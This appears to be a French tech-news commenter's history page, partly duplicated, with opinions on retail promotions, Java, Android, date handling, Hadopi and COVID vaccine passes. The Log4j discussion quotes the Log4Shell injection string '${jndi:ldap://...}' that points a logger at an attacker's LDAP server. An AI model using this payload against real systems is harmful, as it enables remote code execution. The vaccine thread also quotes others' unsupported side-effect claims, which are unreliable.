De toutes façon, un magasin qui fait des promos à foison, je n’y vais pas:
1 ils se font de toutes façons grosso modo autant de marge voire plus sur la période *2 ça signifie que de toutes façons dans ce magasin, tu te fais enfler tout le reste de l’année.
Le
25/01/2022 à
11h
03
Ohmydog a dit:
Tu confonds vente à perte et Revente à perte. La vente à perte est très courante, la Revente à perte est interdite. Oula, éclaire moi s’il te plaît. Un hyper ne fait que de la revente, non?
Moi ce qui m’éclate, c’est les campagnes de promos ou le prix barré est le même que le prix affiché, celles où on compare le prix du puissance 4 de voyage qui est 40c moins cher avec un slogan “c’est moins cher chez nous” et les “carburant à prix coûtant” - ce qui change le prix et 1/2c par litre dans les hypers, donc le détour ne vaut même pas le coût…
Mais les distorsions de concurrence manifestes qui tue les autres commerce uniquement pour que l’hyper puisse survivre quelques mois de plus…
Le
25/01/2022 à
07h
11
“Vente à perte”: jamais vu le cas pour de l’alimentaire. Ou alors à perte du fournisseur dont on plie le bras jusqu’à un prix déraisonnable.
Par contre, vente à perte sur l’électro pour fidéliser le client sur un hypermarché… 50% de la console remboursée sur la carte magasin, 50% d’un ordi remboursé sur la carte (ordi sur lequel le prix correspondrait déjà à plus de 100% de marge…)….
Je passe les boutiques cadeaux sur lequel on vous annonce 50% de réduc par rapport au prix en mag, mais sur lequel il y a encore 100% de marge…
Et le top du top que j’ai vécu, c’est le “pour 2€ de plus la peluche offerte”
(quote:1925051:prog-amateur) Hello, peut-on faire tourner des applications Windows (genre Office) via Wine le tout dans un conteneur ? j’ai une ancienne version d’office que j’aimerais utiliser mais j’aimerais éviter les failles de sécurité. Merci !
… Genre Access95 avec des OCX ? …
Le
19/01/2022 à
15h
24
bilbonsacquet a dit:
Ce qui est marrant, c’est qu’on peut faire tourner des programmes Windows sous Windows avec Wine (via WSL…)
J’aurais préféré utiliser des applis via Wine sous Windows sans WSL. J’en ai déjà eu besoin…
Si ça se trouve dans pas longtemps changement radical d’architecture chez Intel qui va dire adieux au X86, ceci sera une révolution faudra tout changer
Ce que je vois plutôt se profiler: coeurs x86 pour la compatibilité (genre les coeurs E), et une “intégration” GPU/AI/autres traitements en vogue pour les perfs, mais pas forcément x86. Avec one API, intel a encore un atout dans sa manche.
Le x64 hautes perfs a toutefois encore quelques niches - tant que peu de plate-formes alternatives accessibles peuvent monter autant en RAM qu’un x64 et à “si peu” de frais.
(quote:1922010:étienne) Vous conseillez quoi pour commencer la domotique fait maison, pour qqun qui connait un peu linux et veut connecter 2-3 trucs par ci par là?
Homeassistant. Très simple. Si tu bidouilles, installe bien la version “hyperviseur”.
HS à part, je serai curieux de voir la réelle différence de perf entre le décodage de leur BCD, et la lecture d’un vrai timestamp ;)
Sur un x86, le décodage BCD est cablé depuis le 8086 (d’ailleurs, c’était utile à l’époque, maintenant un peu moins :))
Le
04/01/2022 à
10h
04
(quote:1920781:alex.d.) Vu que je fais de la prog système, oui Il suffit que ce soit bon dans l’OS pour que je ne sois pas embêté. Après, ceux qui font du spaghetti php, eux ils sont pas sortis de l’auberge.
Après, il ne faut pas se focaliser que sur les dates… Ou que sur l’OS. Le problème des dates:
Ton OS te renvoie une date en int64
Ton langage traite une date en float
Ta BDD stocke ta date encore autrement. -> Tu arrives à des cas où si tu relis la date en BDD, elle est différente de la date relue de l’OS. Donc il faut systématiquement arrondir à la seconde. Donc opérations en plus à chaque lecture à ne pas oublier.
Sans parler de l’étape de restitution en HTML/Javascript qui a encore un codage et stockage différents…
Les problèmes les plus touchy que je connaisse en informatique de gestion/web:
Les dates (UTC, pas UTC, formats zarbis, limites, précision, incomparabilité)
Les cultures (le ./;, culture du logiciel/de la session/du système, le passage d’infos d’une librairie culturée à une couche non culturée et la préservation de la culture…)
Le texte et les formats texte (les accents dans tous les codages possibles et imaginables, l’UTF8 non canonique, les HTML/XML formé en concaténant des chaînes sans jamais passer par un parseur standard qui le refuse à la fin)
Les algos, le système, c’est complexe mais facile car “prouvable” (et généralement assez déterministe). Le reste ça paraît simple mais c’est hyper fragile.
Le
03/01/2022 à
13h
33
(quote:1920595:Trit’) Windows (et Windows NT) n’utilisent pas les timestamps UNIX pour calculer le temps. Et leurs plages de dates va du 1/1/1980 au 31/12/2099 (enfin, au moins pour les Windows pas NT).
Bien malin celui qui peut dire quel format est utilisé dans tous les endroits du système. Exemples:
Windows 98 plantait au bout de 49j (2^32 secondes)
Excel, OLE, utilisent des dates/heure en virgule flottante (partie entières= les jours à partir de 1900, partie réelle = heures/minutes/secondes)
NTFS a une précision > SAMBA v1 (quand on enregistrait un fichier NTFS sur un samba, la seconde pouvait changer et les fichiers étaient toujours détectés comme modifiés)
En interne, .Net semble utiliser des “ticks” compatibles UNIX en 64 bits pour les datetime
Le
03/01/2022 à
10h
21
fred42 a dit:
Quelles bonnes idées, ils ont les développeurs !
Pfff, toujours à râler. Le mec il a ultra optimisé son format de date pour être géré super rapidement et on se plaint … Jamais contents les utilisateurs…
Je sais qu’il n’y a pas forcément matière à modérer mais on a rarement vu des topics au contenu aussi nauséabond sur ce site. Certain ont le cerveau qui a complètement fondu en cette période de covid/vaccin.
“Faut pas prendre les cons pour des gens 3” est sorti. Je l’ai, et j’ai ma carte de con. Enfin un peu de reconnaissance dans ce monde.
Le
22/12/2021 à
16h
04
letter a dit:
Le capacité hospitalière? Qu’on l’adapte en fonction des proportions. 10% de non vaccinés? 10% des places dispos en services COVID pour les non vaccinés.
Et on fait pareil avec ceux qui fument, qui ne font pas de sport, qui ont des antécédent cardiovasculaires ou de cancer de la famille: pourquoi les soigner?
Franchement, accepter un pass vaccinal pour éviter de vivre dans un pays qui choisit qui doit vivre ou mourrir physiquement, ça me va.
Des vaccins obligatoires, on en a déjà.
Le
22/12/2021 à
16h
02
CsXmmTNj a dit:
Si les gens arrêtaient de psychoter sur une simili-grippe.
Même réponse: là on ne psychote pas sur une simili grippe, mais sur le fait que les soignants sont à bout, que le système de santé se bloque.
Le
22/12/2021 à
16h
00
Menth a dit:
Et pourtant tu psychotes pour une grippette qui tue quelques vieux en fin de vie… âge médian des décès, 85 ans… et blindé de comorbidités en plus…
Et qui sature notre système de santé, tu l’oublies. C’est ce qui me préoccupe le plus actuellement. La majorité survit, mais les soignants travaillent dans un rush permanent depuis 2 ans…
Sinon, je vois que tu n’as pas d’exemple de pas de bol: les gens jeunes, sans comorbidité, non morts mais avec des séquelles depuis des mois suite à une intubation…
Le
22/12/2021 à
14h
57
Menth a dit:
Thromboses, myocardites, péricardites et difficulté à te reproduire tu classes ça dans indésirable ou pas ?
0,08*0,26% de chances, je classe cela tout court. Si je devais me soucier de ne pas faire ce qui pourrait mal tourner dans 0,02% des cas, je ne conduirais pas, je ne monterais pas d’escalier, ne cuisinerais pas et ne remettrais pas de bûche dans la cheminée.
spidermoon a dit:
Aussweiss, papier… avec cette loi, n’importe quel vigile de supermarché, n’importe quel tenant de bar pourra contrôler qui je suis. Mais je ne suis pas surpris. La prochaine étape sera 4ieme dose pour les plus de 60ans, 3ieme pour les plus de 50, sinon plus de loisir, de course dans les supermarchés. Mais vous n’êtes pas obligés d’être vaccinés, suffit de rester chez soi et se faire delivrooter ou uber eater
Si les gens arrêtaient de psychoter sur le vaccin, s’ils respectaient tranquillement les gestes barrières, on n’aurait peut-être pas besoin de ce genre de lois. Comme chacun prend ses aises avec les conseils en considérant que ça ne le concerne pas, l’état est bien obligé d’intervenir.
La vraie question est: quand ça va finir, qui va avoir l’honneur de déclarer cette “crise” terminée? Et comment détricoter tout cela quand ce ne sera plus une crise, mais le nouveau mode de vie (je veux dire le virus)?
À partir du moment où c’est interdit, c’est au business man de s’assurer de lancer un business compatible avec la loi. S’il ne peut pas, son business n’est pas viable. Soit, là il est déjà lancé, mais sans respecter la loi, donc on est amené à avoir se poser la question “doit-on interdire un business qui ne respecte pas la loi”, ce qui est paradoxal selon moi car la réponse est bien évidemment oui.
Merci. C’est juste se mettre en conformité avec la loi, ou sinon…
the_frogkiller a dit:
La loi sur des sites étrangers..
Ben j’espère bien qu’on va trouver comment la faire appliquer. Sans pour autant sortir tout l’arsenal de la Chine. Il y a trop de lois en France qui ne sont pas appliquées et on continue d’en sortir pour les compléter…
Merci pour cette illustration si saillante et malheureusement courante du monde du propriétaire (je n’ose dire représentative, car après tout il y a aussi des brebis galeuses dans l’open source qui mettent la majorité des features en premium, mais je le pense néanmoins très fort xd).
Ca c’st le vieux monde. Le nouveau monde c’est: “Nous utilisons des technologies opensource mais nous sommes incapable d’installer notre soft, nous fournissons du SAAS ou des VM. Nous sommes incapables de patcher les couches basses car nous n’avons plus les (la) ressources qui ont créé la base du logiciel. Mais on est opensource!!!”
Après, le truc c’est que avec un peu de sécu (genre: aucun serveur ne peut initier une communication vers l’extérieur), on a un peu de temps pour patcher.
SIaelrod a dit:
Disons que Java comme notre feu flash, a un nombre impressionnant de vulnérabilité critique et une plus que mauvaise image quand on parle de la sécurité. En effet les autres language aussi ont ce problème j’en convient. Mais java est plus lent que les language concurrent et n’apport rien (si on exclus le multiplateforme qui a l’époque était quasi impossible sans java).
Tu n’es donc pas un programmeur.
La mauvaise image de Java vient:
D’un bashing à une époque où on disait que Java était plus lent que le C sur le calcul. Sauf que dans une appli de gestion, le calcul est rarement nécessaire. Et Java a apporté le support des nombre décimaux, des dates, de l’unicode là où c’était un CALVAIRE en C. Et s’il fallait comparer les perfs de calcul, ceux qui faisaient du C auraient dû se comparer au fortran - ce n’aurait pas toujours eté à l’avantage du C.
D’un bashing lié au garbage collector - qui a été ensuite implémenté dans des bibliothèques C/C++ - car oui, c’est utile. Java ne donne pas le choix de ne pas l’utiliser par contre
De plusieurs versions bien pourries (Java5, Java6 et un peu 7) qui cassaient des compatibilités
D’une librairie graphique bien lourde (mais avec l’ancienne librairie graphique, je faisais du Java sur un 486 avec 16Mo de RAM sans problème
Là où Java à imposé une vision plus moderne du dev:
Java ne nécessite pas de tout recompiler à chaque fois et ça marche (coucou borland C++ et la précompilation… ou watcom C)
Java simplifie les injections de plugins
Java proposait du multithread et de la synchro plus simple et portable dès le début
Java proposait la gestion des échanges réseau, du HTTP, du HTML, du XML, des dates, des décimaux de façon intégrée et “cohérente” là où en C/C++ il fallait se battre
Java a une documentation centrale depuis le début
Java a des défauts, mais alors dire qu’il est lent à l’époque Python, Javascript, et après la période PHP pré-7 (à partir du 7, les optimisations PHP sous la pression de FB ont permis de diminuer le nombre de serveurs, souvent en divisant par 2 leur nombre), c’est mal connaître l’outil.
Après, il reste LE problème: quand Java c’était SUN, on avait une certaine confiance dans son avenir gratuit, quand c’est devenu ORACLE, on l’a pas mal perdue…
Oui et non: entre les téléphones de la maison et ceux sur lesquels on me demande conseil, j’a très rarement vu un Android “vif”. Il y a toujours des lourdeurs, des temps d’attente, qu’ils aient 1 ou 6Go de RAM. L’ouverture des mails est longue, le lancement de youtube est long, celui des contacts/tel/sms est long, il y a des temps d’attente avant que le clavier ne s’affiche ou qu’il ne soit réactif. Alors OK, je n’ai pas il me semble touché un android > 10.
Après, là où je suis d’accord c’est que je parle d’androids “classiques”, donc avec toute la plate-forme Google qui fait certainement partie de la lourdeur générale. Et je ne vois pas souvent de samsung et je n’ai jamais touché de Sony (bien que j’ai souvent souhaité m’en acheter un)
Par ailleurs, j’imagine que “l’embonpoint” des applis est une pièce du puzzle, ainsi que la vitesse de la flash interne pour la relecture et les perfs réseau. Android recharge tellement régulièrement les données plutôt que de les garder en RAM…
Le
16/12/2021 à
08h
40
fofo9012 a dit:
Quand ça déconne comme ça le mieux c’est de tout backuper faire une restauration des paramètres d’usine et recharger ton backup : tu vas retrouver les perfs d’origine.
En 2021, le “dans le doute tu reboot”: ça montre à quel point Google n’a pas su faire mieux que Ms dans le domaines des OS, même moins bien en fait…
Android continue à “améliorer” l’interface, mais le fond est assez mauvais et dépassé. Google le rustine pour le rendre “moderne”, mais dans le fond ce n’est pas un OS moderne. Comment justifier qu’un téléphone quadri/octa core avec 4/6Go de RAM mette autant de temps à démarrer? Un PC complet met entre 10 et 30s à démarrer de 0, un téléphone met près d’une minute pour être “démarré” et encore plus pour être utilisable.
La partie téléphone/SMS, qui devrait être ultra snappy, a une certaine latence au chargement sur de nombreux tel.
Si je reprends mon Windows Phone, il est bien plus utilisable et agréable en tel/SMS que n’importe quel android que j’ai vu.
Le
15/12/2021 à
14h
10
ForceRouge a dit:
Chaque année Le nouveau smartphone est X % plus rapide que l’ancien, mais l’appli SMS rame toujours de plus en plus.
Quand elle fonctionne. Elle me réactive les “fonctionnalités de chat” qui font que les messages ne passent pas toujours :(
Certains se plaignent de Windows. Moi je me plains d’Androïd, pas fichu d’afficher des SMS sans devoir recharger l’appli sur un téléphone qui a 4Go de RAM… La pire archi du monde…
(quote:1918036:alex.d.) Tiens, je suis étonné que le score lamentable d’Amazon n’ait pas encore fait bondir tous ses admirateurs qui encensent en permanence sont grand respect du client.
C’est l’indice de réparabilité, ça ne concerne pas vraiment Amazon qui travaille l’indice de remplacement total
Après le 2 qui était franchement brouillon, et le côté “on va intégrer un perso de Harry Potter au forceps pour ramener du public”, pas sûr d’avoir envie de le voir. Le 1 était bien, le 2 on avait l’impression qu’ils essayaient de tordre l’histoire pour faire rentrer du Harry Potter carré dans un trou presque rond, tout en balançant la sauce “ambiance noire/malaisante” et un bon gros nappage d’effets spéciaux…
Ca m’a fait l’impression de “je vous remets un peu de chocolat sur votre raclette à la crème?”
Et moi, que Oqee fonctionne sans freeze avec les flux TV en direct…
Les freeze concernent à peu près tous les utilisateurs autour de moi, quelque soit l’utilisation et quelque soit la box et la techno (fibre ou ADSL): TV, netflix, JV, téléchargement, téléphonie (plus de son pendant plusieurs secondes/dizaines de secondes), et même surf (pages introuvables)
Ca varie entre plusieurs fois par jour et plusieurs fois par heure, depuis au moins un mois. Aucune comm de free. Seule solution actuellement: quitter free.
L’attaquant passe simplement l’adresse vers son serveur LDAP.
KooKiz a dit:
L’idée est d’envoyer une requête de sorte que l’application cible log la chaine “${jndi:ldap://serveur_externe}”
OK, merci. Bon, il faut quand même que le serveur ait accès à tout et n’importe quoi (ici même les serveurs web n’ont pas accès au web en sortie)
Le
13/12/2021 à
09h
19
“An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled”
Donc il faut que l’attaquant ait accès au LDAP et ait intégré dans le LDAP une charge de travail? En binaire?
Après, je suis tout à fait d’accord sur le problème de la multiplication des frameworks - normalement, je fais une chouche d’abstraction entre mon soft et le framework afin de:
Savoir quelles appels j’utilise en vrai dans le framework
Pouvoir m’en séparer ou le remplacer par un autre.
40 secondes pour la musique et les paroles. @QTrEIX je t’offre les droits sur cette création si tu veux le mètre sur Bandcamp à une condition: jamais tu me cites comme auteur, compositeur, ayant-droit ou cuistot !
Il y a plus de créativité que dans certains trucs qui passent à la radio :) Et un potentiel à rester dans la tête toute la journée… D’ailleurs, il faut que je soumette cette idée: détecter ceux qui se passent des chansons/musique dans la tête et n’en payent pas les droits :)
Le
08/12/2021 à
11h
48
Cumbalero a dit:
Il y a aussi les ayants-droits qui se gavent dès que possible. Je ne considère pas que quoi que ce soit me soit dû, contrairement à eux, mais à partir du moment où ils sont rémunérés sur le simple fait que j’achète un disque dur pour mettre dans mon NAS, j’estime qu’une part de celui-ci peut héberger quelques oeuvres sans que je les rémunère une deuxième fois,
C’est ce principe que je ne comprends pas. Il y a un système, il est lent à faire bouger, mais si on ne lui donne pas sas chance on ne peut pas dire qu’il a des défauts. C’est comme traverser au rouge sur un passage piéton “parce qu’il n’y a jamais de voiture”. Ou rouler à 130 au lieu de 110 parce ce qu’ILS font chier.
Ceux qui téléchargent à gogo, pourquoi se plaignent-ils d’un organe qu’ils légitiment?
Je gagne ma vie grâce à la grande distribution. Je fais l’essentiel de mes courses chez les petits commerçants et au marché. Suis-je une pourriture ?
Non, tu as le choix, comme on a le choix de payer Netflix ou Disney, ou le choix de cultiver chez soi ou même le choix d’aller prendre directement dans les champs. Mais si on va prendre dans les champs, on ne va pas se plaindre en disant “mais ça ne se voit pas” quand même???
Tu as pourtant 300CDs, ça fait pas un par jour, tu dois en écouter certains en boucle dont pas mal que je trouverais très mauvais.
Oui, tout n’est pas excellent :) Mais pas grand chose sur les plate-forme de musique ne me plaît, on nous rabâche pas mal de musiques reprises, simpliste, sans expression artistique, limite une IA de base pourrait la générer.
Tu ne comprends pas qu’on regarde plusieurs séries chaque année? Une saison fait généralement entre 10 et 30 épisodes, essentiellement de moins d’une heure. Il y a 365 jours dans une année pour rappel.
En général 22 épisodes par saison, qui correspond en gros à une diffusion de 1 épisodes toutes les 2 semaines - moins la période estivale. Même à 20min/épisodes, ça te fait 7h par série par an. Donc une à deux séries par an, plus un film toutes les deux semaines, je comprends, mais plus… Sauf que j’ai des enfants, donc on regarde forcément ensemble (règle de base de la famille: personne ne s’isole pour regarder un truc ou jouer ou être sur son téléphone) et on a beaucoup d’activité annexes.
Par contre, je constate que mes enfants regardent la TV pour se divertir, pas juste pour être en mode patate de canapé, bref ils ont un certain esprit critique qui me plaît
On a pu regarder “Good Omens” sur Amazon Prime, 6x50min, ça a été très galère à caser dans le planning :) (d’ailleurs, au cas où il disparaîtrait, je l’ai acheté)
Ton commentaire est écœurant de suffisance. Oui. Je sais. J’assume. C’était un “troll”. Je suis beaucoup plus gentil et empathique que ça en vrai :) Mais je ne comprends pas pourquoi les gens se plaignent: ils ont des tonnes de moyen de voir des “oeuvres culturelles” à faible coût, et si quelque chose leur tient à coeur, ils se l’offrent ou se le font offrir.
Il y a un certain égocentrisme dans les gens qui sont très consommateurs de JV et Netflix, avec le tout/tout de suite/maintenant/et on me le doit, qui me semble casser une construction de base dans le plaisir, liée à l’attente, à la recherche du moyen d’obtenir… J’ai grandi avec les VHS, et Madmovies pour savoir que regarder -> beaucoup de mes films préférés le sont à cause de la “quête” pour les trouver.
Et comme je suis dans l’informatique, par acquis de conscience, comme je gagne ma vie en faisant des logiciels, je ne pirate pas de contenu ou de logiciel.
Le
07/12/2021 à
20h
42
sybylle a dit:
Merci pour les suggestions :)
Bon, certains m’ont déçus (notamment death note - peu d’intérêt, pas de vraie construction “d’énigme”, bref, pas mon style)
Gunnm lui-même à sa sortie m’avait ennuyé sur certains tome qui sont des fillers. Je les ai passés à toute vitesse.
QTrEIX a dit:
Il faut un peu sortir des sentiers battus, un dont je suis fan est [Dorohedoro] Beaucoup de mangas sont produits à la chaîne, suffit de voir l’enfer que vivent certains mangakas, donc forcément, on en trouve aussi des banales.
Merci aussi. Je n’achète/lit/regarde rien qui ne soit pas déjà fini (et en général, si plus de 3 saisons -> je ne regarde pas ou en accéléré avec la liste des épisodes clés)
Beaucoup de séries (manga, BD, série TV, jeux) ont une bonne idée de départ, un bon twist à un moment, mais souvent pour des raisons commerciales les créateurs/producteurs ne savent pas s’arrêter/garder l’esprit/le rythme.
C’est extrêmement difficile de trouver quelque chose d’intéressant, mais au lieu de chercher à tout regarder, je préfère “l’ancienne” méthode: lire les revues. Et je suis très patient, je peux attendre longtemps pour être sûr de vouloir acheter quelque chose (d’où je n’ai jamais vu la fin du seigneur des anneaux par exemple).
Mais si ça vaut le coût, je veux le posséder (quitte à le racheter quand il s’abîme: j’ai acheté 3 fois monkey island, 2 fois blade runner, 2 fois le livre “la toile entre les mondes” - ce qui pour le dernier est une forme de quête pour le trouver). J’ai acheté les DVD de Daria, ceux de Pushing daisies (aucun des deux n’est au complet en France voire en Europe), et je suis en train d’acheter les DVD de “The Middle” (là il faut courir après les versions).
Je n’ai pas de MP3, juste ceux de mes CD (plus de 300) - mais le matin en me levant, je sais ce que je veux écouter, et je dépense régulièrement 10-60€ en CD avec ma liste d’achats à faire (beaucoup en occasion, car plus dispos en neuf)
Bref, je ne suis pas client hadopi du tout… Ce qui ne m’empêche pas de trouver son principe un peu trop simpliste et rarement en phase avec la réalité.
Notamment concernant le DNS-over-HTTPS: ce sera certainement un nouveau moyen pour les GAFA de collecter nos données, mais cette fois-ci en toute discrétion. J’imagine que Android, iOS et certainement Windows vont configurer le leur par défaut à leur guise, évinçant les FAI.
Le
07/12/2021 à
17h
35
darkjack a dit:
“La liste noire pourrait ainsi enrichir des extensions « que les internautes [pourront] intégrer à leur navigateur afin que l’accès aux sites illicites fasse l’objet d’une alerte ou d’un blocage. »”
Je serais assez content d’avoir une liste à intégrer au proxy de la maison.
SomeDudeOnTheInternet a dit:
Euh, non ? Ça dépends totalement des gens, il y en a plein de regardent bien plus que ça. Et pour les séries énormément de personnes regardent l’équivalent en temps d’une bonne dizaine (voire bien plus) par mois.
Ils ont trop de temps :) Ils devraient l’occuper à gagner plus d’argent s’ils en manquent…
Non plus ? C’est extrêmement réducteur comme point de vue, il y a énormément d’excellents mangas dont la qualité ne baisse pas au fil des tomes.
Enormément -> non, clairement non.
Si tu lis un tome de manga par semaine et regarde un film, tu en est déjà à environ 80 € par mois
Les DNS étranger sont souvent gratuits (ex. Google ou Cloudflare)
Le VPN est surtout utile pour accéder à des contenus inaccessibles en France, pas pour une histoire de moyens financiers
Ben 80€ par mois, ça se trouve… Maintenant, je ne vois pas en quoi le manga est bloqué par la hadopi: tu es bien obligé d’acheter les livres… 2 & 3: je ne vois de VPN quasiment que chez des ados “gogo” qui n’ont rien compris à l’intérêt et à ce que c’est. Donc j’imagine qu’une bonne pub sur les DNS devrait leur faire acheter :)
Perso, je ne vois pas où est le plaisir de se gaver de séries et de films rarement très bons (pour ne pas dire en général très moyens) et qu’on a l’impression d’avoir déjà vus. Je ne comprends pas comment les gens peuvent regarder plusieurs séries par an.
De même pour les mangas (pour ceux que ma fille a voulu me faire lire: Moriarty, Dr stone, …) on sent le côté “il faut accrocher” puis le “il faut livrer”, comme dans les séries à la TV ou sur les plate-formes. On joue juste sur le côté “collectionneur”, il n’y a ni fin ni même scénario réel, que du coup de théâtre au bon vouloir du scénariste (et du producteur j’imagine)
Le
07/12/2021 à
16h
11
SomeDudeOnTheInternet a dit:
Tout le monde n’a pas les moyens de se payer des bouquins, des films, que ça soit par manque de revenus ou simplement parce qu’on est trop jeune pour pouvoir s’en payer soi-même.
Après on consomme quoi: un, deux films par mois? On n’a pas trop le temps d’en voir plusqaund aux mangas, ils comprennent vite que c’est souvent une arnaque bien rodée: 1⁄2 arc pour ferrer le poisson, ensuite c’est bâclé et un nouveau sort. Comme les séries. Utiliser de l’argent, ça permet de se rendre compte qu’il faut choisir et souvent être frustré. Là on apprend aux gens à ne pas être frustré…
mais la majorité des gens ne sait pas comment faire ni qu’on peut le faire, donc ça va dans leur sens.
Ben au lieu de payer 10€ par moi pour un CD, une BD, ils paieront 10€ par mois pour un DNS en plus des 10€ du vpn.
Le
07/12/2021 à
15h
41
SomeDudeOnTheInternet a dit:
, d’autre part pour beaucoup de personnes n’ayant que peu de moyens et aussi pour les plus jeunes c’est le seul moyen d’avoir accès à un très grand nombre d’oeuvres culturelles qui seraient inaccessible autrement.
Ils peuvent aller au musée, il y a plein d’occasion d’y aller gratuitement.
Sérieux, à quelles “oeuvres culturelles” les jeunes accèdent auxquelles elles ne pourraient pas accéder?
Par contre, leur liste noire me fait marrer. Comment tu veux faire avec un DNS over HTTPS? Comment faire avec une mutualisation des serveurs dans les clouds? Et je sens bien la liste en IPv4. Passez en IPv6, je ne crois pas que Hadopi suive…
(quote:61906:christophe.agostini) Intéressant, bien hâte de voir les benchmarks quand ça sortira. Question: existe-t-il des solutions tout en un abordable autour d’une architecture RISC-V ? Genre pour se faire les dents et s’amuser sans se ruiner?
J’utilise une maixbit (20-25€) et une longan nano (5€ à l’époque): les deux ont beaucoup de possibilités sur le papier, et beaucoup de limites en pratique (disons que j’en ai eu pour mon argent :) ) . Mais on s’amuse.
La 5G consommera moins au fur et à mesure que la technologie avancera. Tout comme la 4G consommait plus au début, et ainsi de suite, comme toute autre technologie.
Je ne suis pas tout à fait d’accord. Les liaisons radio ont un besoin énergétique non compressible - sauf si tu es plus proche de l’antenne.
Pour les PC arm, il y a toujours le dev kit de Microsoft à 220€, mais j’ai l’impression qu’on est vraiment sur de l’équivalent mini PC atom. Je ne pense même pas que ce soit un ssd dedans.
Le
02/12/2021 à
10h
52
Soraphirot a dit:
Il y a un souci dans ton raisonnement : les Apple Axx sont tout aussi impressionnants, et ce sont bien des modèles pensés pour les portables. De plus des puces ARM pour ordinateurs existent aussi en dehors des quelques références Qualcomm poussives. Regarde du côté des articles sur Altra.
Je voulais juste dire que ce n’est pas le M1 qui évince les concurrents sur les portables. Quand à Altra, comme tu le dis, c’est du marché de niche. Je ne connais pas de concurrent sur le grand public.
Bien sûr, Qualcomm a équipé le dev kit Windows ARM, mais la puce ne semble pas taillée pour être sur du PC “classique”, plutôt sur des PC bas de gamme comme les Pentium N5000 voire les anciens Atom en SOC. Et là, le Qualcomm fait le job et sur les benches en tout cas est meilleur que ces petits Intel. Mais niveau connectivité c’est néant. Bref, pour le moment le M1 se compare aux Intel/AMD, mais aucun concurrent ARM n’existe sur ce segment (d’ailleurs peu porteur pour le moment)
Le
02/12/2021 à
10h
42
David_L a dit:
Le principe de l’évolution des puces c’est de renforcer l’efficacité énérgétique à chaque génération. Après faire la même perf à conso réduite ou plus de perfs à ISO conso c’est un choix.
Je pense qu’on peut toutefois douter que la 5G puisse aller à la fois vite et ne pas consommer. Déjà que mon tel consomme nettement moins en 3G qu’en 4G, je pense que ce sera pareil pour 4G vers 5G.
Bien sûr, il faut prendre en compte le fait que la 5G téléchargera plus vite donc sera censée avoir un rapport conso/h plus intéressant.
Mais ce n’est pas gagné: qui dit plus de vitesse de téléchargement dit aussi plus de stress sur les autres puces, notamment pour le déchiffrement du flux, il est donc difficile de savoir dans quelle mesure l’augmentation va augmenter la conso globale d’une plate-forme (sans compter l’occupation CPU)
Par ailleurs, utilisant des vieux téléphones en désactivant le modem, je peux dire que le modem consomme énormément (on passe de 2-3j d’autonomie à 10 facile sur des téléphones de 2015 et 2018).
Donc je suis circonspect comme @Fuli et le rejoint: le débit 5G pourrait être bridé pour ne pas consommer trop. Notamment si on mix 5G et ancienne archi (ce qui n’est pas le cas ici heureusement pour un fer de lance).
Et même côté antennes, la 5G est soit plus énergivore que la 4G, soit moins: plus en valeur absolue, moins en théorie si on la rapporte au Go transféré - dans l’hypothèse où suffisamment de gens téléchargent suffisamment de données et qu’on oublie les périodes où personne ne se connecte…)
3767 commentaires
Encadrement des promotions, « gratuit » : les lignes directrices de la DGCCRF sur l’alimentaire
24/01/2022
Le 25/01/2022 à 11h 04
De toutes façon, un magasin qui fait des promos à foison, je n’y vais pas:
*2 ça signifie que de toutes façons dans ce magasin, tu te fais enfler tout le reste de l’année.
Le 25/01/2022 à 11h 03
Moi ce qui m’éclate, c’est les campagnes de promos ou le prix barré est le même que le prix affiché, celles où on compare le prix du puissance 4 de voyage qui est 40c moins cher avec un slogan “c’est moins cher chez nous” et les “carburant à prix coûtant” - ce qui change le prix et 1/2c par litre dans les hypers, donc le détour ne vaut même pas le coût…
Mais les distorsions de concurrence manifestes qui tue les autres commerce uniquement pour que l’hyper puisse survivre quelques mois de plus…
Le 25/01/2022 à 07h 11
“Vente à perte”: jamais vu le cas pour de l’alimentaire. Ou alors à perte du fournisseur dont on plie le bras jusqu’à un prix déraisonnable.
Par contre, vente à perte sur l’électro pour fidéliser le client sur un hypermarché… 50% de la console remboursée sur la carte magasin, 50% d’un ordi remboursé sur la carte (ordi sur lequel le prix correspondrait déjà à plus de 100% de marge…)….
Je passe les boutiques cadeaux sur lequel on vous annonce 50% de réduc par rapport au prix en mag, mais sur lequel il y a encore 100% de marge…
Et le top du top que j’ai vécu, c’est le “pour 2€ de plus la peluche offerte”
Wine 7.0 disponible, une tonne d’améliorations
19/01/2022
Le 19/01/2022 à 15h 26
… Genre Access95 avec des OCX ? …
Le 19/01/2022 à 15h 24
J’aurais préféré utiliser des applis via Wine sous Windows sans WSL. J’en ai déjà eu besoin…
+ 35 % de malwares Linux en 2021
18/01/2022
Le 18/01/2022 à 09h 09
Enfin un peu de reconnaissance pour Linux.
En commission, les députés étendent l’obligation d’installer un contrôle parental
14/01/2022
Le 14/01/2022 à 14h 45
Oui, il faudrait surtout obliger les sites à être conforme à la loi et empêcher les mineurs de se connecter… oh, wait…
Plutôt que de payer la rançon, une victime de ransomware migre de Windows à Chrome OS
12/01/2022
Le 12/01/2022 à 12h 59
Si ils passent à ChromeOS c’est que la majorité des données/applis sont dans le cloud.
Désolé pour eux, ça ne les protège pas vraiment plus du coup…
Il y a 15 ans, Steve Jobs présentait l’iPhone
10/01/2022
Le 10/01/2022 à 12h 02
Le plan ineffable du Dieu Marketing.
Jeff Wilcox, responsable de l’architecture des Mac (Apple Silicon M1, T2), retourne chez Intel
07/01/2022
Le 10/01/2022 à 06h 45
Ce que je vois plutôt se profiler: coeurs x86 pour la compatibilité (genre les coeurs E), et une “intégration” GPU/AI/autres traitements en vogue pour les perfs, mais pas forcément x86. Avec one API, intel a encore un atout dans sa manche.
Le x64 hautes perfs a toutefois encore quelques niches - tant que peu de plate-formes alternatives accessibles peuvent monter autant en RAM qu’un x64 et à “si peu” de frais.
En 2022, Jeedom mettra fin au support de sa V3 et de l’ancien système de DNS
07/01/2022
Le 10/01/2022 à 06h 45
Homeassistant. Très simple. Si tu bidouilles, installe bien la version “hyperviseur”.
Microsoft publie un patch pour corriger son bug Exchange du 1er janvier 2022
03/01/2022
Le 09/01/2022 à 16h 37
Sur un x86, le décodage BCD est cablé depuis le 8086 (d’ailleurs, c’était utile à l’époque, maintenant un peu moins :))
Le 04/01/2022 à 10h 04
Après, il ne faut pas se focaliser que sur les dates… Ou que sur l’OS.
Le problème des dates:
